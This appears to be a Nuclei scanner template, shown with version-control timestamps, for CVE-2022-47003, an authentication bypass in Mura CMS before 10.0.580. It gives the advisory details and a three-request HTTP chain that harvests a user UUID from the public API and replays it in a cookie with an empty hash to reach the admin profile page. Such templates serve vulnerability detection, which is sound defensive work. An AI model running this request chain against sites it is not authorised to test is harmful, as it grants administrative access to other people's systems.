2023-03-13 20:37:30 +00:00
id : CVE-2022-47003
2023-03-14 06:07:42 +00:00
2023-03-13 20:37:30 +00:00
info :
2023-04-10 18:22:47 +00:00
name : Mura CMS <10.0.580 - Authentication Bypass
2023-03-13 20:37:30 +00:00
author : iamnoooob,rootxharsh,pdresearch
severity : critical
description : |
2023-04-10 18:22:47 +00:00
Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability.
2023-03-13 20:37:30 +00:00
reference :
2023-03-13 20:46:21 +00:00
- https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
2023-03-14 17:46:45 +00:00
- http://mura.com
- https://www.murasoftware.com/mura-cms/
2023-04-10 18:22:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-47003
2023-07-11 19:49:27 +00:00
- https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html
2023-03-14 06:07:42 +00:00
classification :
2023-03-14 17:46:45 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-03-14 06:07:42 +00:00
cve-id : CVE-2022-47003
2023-03-14 17:46:45 +00:00
cwe-id : CWE-863
2023-10-14 11:27:55 +00:00
epss-score : 0.02081
2023-10-17 17:52:26 +00:00
epss-percentile : 0.87819
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:*
2023-03-13 20:37:30 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : murasoftware
product : mura_cms
2023-09-06 11:59:08 +00:00
shodan-query: 'Generator : Musa CMS'
2023-03-13 20:37:30 +00:00
tags : cve,cve2022,auth-bypass,cms,mura
2023-04-27 04:28:59 +00:00
http :
2023-03-13 20:37:30 +00:00
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
Host : {{Hostname}}
- |
GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
Host : {{Hostname}}
Cookie : userid={{uuid}}; userhash=
redirects : true
max-redirects : 2
2023-07-11 19:49:27 +00:00
2023-03-13 20:37:30 +00:00
matchers-condition : and
matchers :
- type : dsl
dsl :
2023-03-13 20:43:24 +00:00
- 'contains(body_3,"\"userid\"")'
2023-07-11 19:49:27 +00:00
condition : and
2023-03-13 20:37:30 +00:00
- type : word
part : body_3
words :
- "Edit Profile"
extractors :
- type : regex
name : siteid
group : 1
regex :
- 'siteid:"(.*?)"'
2023-07-11 19:49:27 +00:00
internal : true
part : body
2023-03-13 20:37:30 +00:00
- type : regex
name : uuid
group : 1
regex :
- '"lastupdatebyid":"([A-F0-9-]+)"'
2023-07-11 19:49:27 +00:00
internal : true
part : body